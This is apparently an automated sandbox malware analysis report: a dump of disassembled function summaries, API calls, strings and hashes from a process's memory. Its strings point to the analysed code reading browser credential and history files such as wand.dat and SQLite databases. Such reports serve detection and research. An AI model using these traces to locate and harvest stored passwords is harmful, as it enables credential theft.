                                                                                                                                              • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                                                              • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                                                                              • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                                                              • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                                                                              APIs
                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??3@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 613200358-0
                                                                                                                                              • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                                              • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                                                                              • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                                              • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _memicmpwcslen
                                                                                                                                              • String ID: @@@@$History
                                                                                                                                              • API String ID: 1872909662-685208920
                                                                                                                                              • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                                                                              • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                                                                                              • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                                                                              • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 004100FB
                                                                                                                                              • memset.MSVCRT ref: 00410112
                                                                                                                                                • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                              • _snwprintf.MSVCRT ref: 00410141
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                                              • String ID: </%s>
                                                                                                                                              • API String ID: 3400436232-259020660
                                                                                                                                              • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                                              • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                                                                              • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                                              • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 0040D58D
                                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                                                                              • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                                              • String ID: caption
                                                                                                                                              • API String ID: 1523050162-4135340389
                                                                                                                                              • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                                                              • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                                                                              • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                                                              • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                                                                • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                                                              • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                                                              • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                                                              • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                                                              • String ID: MS Sans Serif
                                                                                                                                              • API String ID: 210187428-168460110
                                                                                                                                              • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                                              • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                                                                              • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                                              • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ClassName_wcsicmpmemset
                                                                                                                                              • String ID: edit
                                                                                                                                              • API String ID: 2747424523-2167791130
                                                                                                                                              • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                                                                              • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                                                                                                              • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                                                                              • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                                                                                                              APIs
                                                                                                                                              • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                                                                                              • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                                                                                              • memcmp.MSVCRT ref: 0041D8CB
                                                                                                                                              • memcmp.MSVCRT ref: 0041D913
                                                                                                                                              • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcpy$memcmp
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3384217055-0
                                                                                                                                              • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                                              • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                                                                                              • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                                              • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memset$memcpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 368790112-0
                                                                                                                                              • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                                                                              • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                                                                                              • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                                                                              • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                                                                                                • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                                                                                                • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                                                                                                • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                                                                                                • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                                                                                              • GetMenu.USER32(?), ref: 00410F8D
                                                                                                                                              • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                                                                                              • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                                                                                              • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1889144086-0
                                                                                                                                              • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                                                              • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                                                                                                              • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                                                              • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                                                                                                              APIs
                                                                                                                                              • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                                                                                              • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                                                                                              • GetLastError.KERNEL32 ref: 0041810A
                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1661045500-0
                                                                                                                                              • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                                                              • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                                                                                                              • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                                                              • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                                                                                              • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                                                                                                                              Strings
                                                                                                                                              • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                                                                                              • virtual tables may not be altered, xrefs: 0042EBD2
                                                                                                                                              • Cannot add a column to a view, xrefs: 0042EBE8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcpymemset
                                                                                                                                              • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                                                              • API String ID: 1297977491-2063813899
                                                                                                                                              • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                                                              • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                                                                                                              • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                                                              • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 0040560C
                                                                                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                              • String ID: *.*$dat$wand.dat
                                                                                                                                              • API String ID: 2618321458-1828844352
                                                                                                                                              • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                                                              • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                                                                              • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                                                              • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                                                                                • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                                                                              • wcslen.MSVCRT ref: 00410C74
                                                                                                                                              • _wtoi.MSVCRT(?), ref: 00410C80
                                                                                                                                              • _wcsicmp.MSVCRT ref: 00410CCE
                                                                                                                                              • _wcsicmp.MSVCRT ref: 00410CDF
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1549203181-0
                                                                                                                                              • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                                                                              • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                                                                                                              • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                                                                              • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 00412057
                                                                                                                                                • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                                                                              • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                                                              • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                                                              • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3550944819-0
                                                                                                                                              • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                                              • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                                                                              • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                                              • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                                                                              APIs
                                                                                                                                              • free.MSVCRT ref: 0040F561
                                                                                                                                              • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                                                                              • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcpy$free
                                                                                                                                              • String ID: g4@
                                                                                                                                              • API String ID: 2888793982-2133833424
                                                                                                                                              • Opcode ID: d5a05b92b3455112f10c9f31d65c512587a8559eeac8cc3fc14f0db32937a076
                                                                                                                                              • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                                                                              • Opcode Fuzzy Hash: d5a05b92b3455112f10c9f31d65c512587a8559eeac8cc3fc14f0db32937a076
                                                                                                                                              • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                                                                              APIs
                                                                                                                                              • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                                                                                              • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                                                                                              • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcpy
                                                                                                                                              • String ID: @
                                                                                                                                              • API String ID: 3510742995-2766056989
                                                                                                                                              • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                                              • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                                                                                              • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                                              • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                                                                                              APIs
                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040AF07
                                                                                                                                              • memset.MSVCRT ref: 0040AF18
                                                                                                                                              • memcpy.MSVCRT(0045A474,?,?,00000000,00000000,?,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??2@??3@memcpymemset
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1865533344-0
                                                                                                                                              • Opcode ID: 656bc52577548dce7c664571d44393d4b9863a75184cdcc152229e984c3c4871
                                                                                                                                              • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                                                                                                              • Opcode Fuzzy Hash: 656bc52577548dce7c664571d44393d4b9863a75184cdcc152229e984c3c4871
                                                                                                                                              • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 004144E7
                                                                                                                                                • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                                              • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                                                              • memset.MSVCRT ref: 0041451A
                                                                                                                                              • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1127616056-0
                                                                                                                                              • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                                                              • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                                                                              • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                                                              • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                                                                              APIs
                                                                                                                                              • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                                                                                                              • memset.MSVCRT ref: 0042FED3
                                                                                                                                              • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcpy$memset
                                                                                                                                              • String ID: sqlite_master
                                                                                                                                              • API String ID: 438689982-3163232059
                                                                                                                                              • Opcode ID: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                                                                              • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                                                                                                              • Opcode Fuzzy Hash: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                                                                              • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                                                                                                              APIs
                                                                                                                                              • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                                                                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                                                                                              • wcscpy.MSVCRT ref: 00414DF3
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3917621476-0
                                                                                                                                              • Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                                                                                              • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                                                                                                              • Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                                                                                              • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
